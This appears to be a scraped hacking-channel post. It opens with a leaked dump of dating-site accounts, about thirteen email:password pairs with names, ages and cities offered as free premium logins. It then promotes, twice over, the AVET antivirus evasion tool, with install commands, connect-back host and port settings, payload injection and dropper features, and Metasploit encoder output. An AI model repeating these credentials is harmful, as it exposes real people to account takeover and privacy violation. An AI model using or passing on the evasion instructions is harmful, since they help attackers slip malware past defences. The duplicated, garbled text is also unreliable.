🦑LEVO (DATING) & Chats FREE PREMIUM ACCOUNts VERFIED XD :
alextreize@live.fr:treizejuin | Name = alex82 | Gender = male | Age = 36 | Credits = 55 | VIP = 0 | City = Verdun-sur-Garonne | Country = FR |
barwita89@live.fr (barwita89@live.fr):220174 | Name = Karim | Gender = male | Age = 42 | Credits = 97 | VIP = 0 | City = Bruxelles | Country = BE |
beufa1@live.fr:etimrehl | : Name = fabien | Gender = male | Age = 41 | Credits = 20 | VIP = 0 | City = Caen | Country = FR |
raikon7g7@yahoo.fr:50 (raikon7g7@yahoo.fr:50)cent | Name = David geneva | Gender = male | Age = 30 | Credits = 105 | VIP = 0 | City = Genève | Country = CH |
antonio.cerdeira@free.fr:catherine | : Name = grosse92 | Gender = male | Age = 43 | Credits = 10 | VIP = 0 | City = Paris | Country = FR |
barbier_77@live.fr:alasco24 | : Name = Kéré | Gender = male | Age = 26 | Credits = 229 | VIP = 0 | Cit
alicesurgand42@outlook.fr (alicesurgand42@outlook.fr):05272481 | Name = durand2014 | Gender = male | Age = 23 | Credits = 75 | VIP = 1 | City = St Albans | Country = GB |
bada-.-boom@live.fr:EXIL95zik | Name = Ronan | Gender = male | Age = 33 | Credits = 20 | VIP = 0 | City = Nantes | Country = FR |
bastou24@aliceadsl.fr:bougnat24 |Name = seb | Gender = male | Age = 42 | Credits = 8 | VIP = 0 | City = Sarlat-la-Canéda | Country = FR |
alexioo@live.fr (alexioo@live.fr):123321aa Name = allexx | Gender = male | Age = 32 | Credits = 65 | VIP = 0 | City = Gaillard | Country = FR |
rem64@live.fr:destroy360 | Name = Rem Farga | Gender = male | Age = 29 | Credits = 25 | VIP = 0 | City = Bayonne | Country = FR |
antoine.fournier59@orange.fr:473 (antoine.fournier59@orange.fr:473)cxn59 | Name = Antoine | Gender = male | Age = 34 | Credits = 0 | VIP = 0 | City = Valenciennes | Country = FR |
sebastien.boncino@wanadoo.fr:musculation | : Name = Sebastien | Gender = male | Age = 42 | Credits = 18 | VIP = 0 | City = Aubagne | Country = FR |
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated AntiVirus Evasion Tool
t.me/undercodeTesting
🦑 features:
1) when running a .exe file made with msfpayload & co, the file will often be recognized by antivirus software
2) AVET is an antivirus evasion tool targeting windows machines with executable files
3) different kinds of input payloads can be used now: shellcode, exe and dlls
4) more techniques available: shellcode/dll injection, process following and more
5) flexible retrieval methods for payload, decryption key, etc.
usage as a dropper
6) Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary
7) combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques
basic sandbox checks
8) executie all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of "malicious" samples using different evasion and injection techniques
🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :
1) git clone https://github.com/govolution/avet.git
2) cd avet
3) ./setup.sh
4) then run as python python3 avet.py
🦑how to use ?
# build the .exe file that loads the payload from a given text file
Configure the Build Script
# override connect-back settings here, if necessary
-> LPORT=443
-> LHOST=192.168.56.101
# no command preexec
-> set_command_source no_data
-> set_command_exec no_command
# enable debug output
-> enable_debug_print
Executable will be created Shortly please wait.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 692 (iteration=0)
x86/shikata_ga_nai chosen with final size 692
Payload size: 692 bytes
Final size of c file: 2933 bytes
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated AntiVirus Evasion Tool
t.me/undercodeTesting
🦑 features:
1) when running a .exe file made with msfpayload & co, the file will often be recognized by antivirus software
2) AVET is an antivirus evasion tool targeting windows machines with executable files
3) different kinds of input payloads can be used now: shellcode, exe and dlls
4) more techniques available: shellcode/dll injection, process following and more
5) flexible retrieval methods for payload, decryption key, etc.
usage as a dropper
6) Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary
7) combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques
basic sandbox checks
8) executie all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of "malicious" samples using different evasion and injection techniques
🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :
1) git clone https://github.com/govolution/avet.git
2) cd avet
3) ./setup.sh
4) then run as python python3 avet.py
🦑how to use ?
# build the .exe file that loads the payload from a given text file
Configure the Build Script
# override connect-back settings here, if necessary
-> LPORT=443
-> LHOST=192.168.56.101
# no command preexec
-> set_command_source no_data
-> set_command_exec no_command
# enable debug output
-> enable_debug_print
Executable will be created Shortly please wait.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 692 (iteration=0)
x86/shikata_ga_nai chosen with final size 692
Payload size: 692 bytes
Final size of c file: 2933 bytes
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁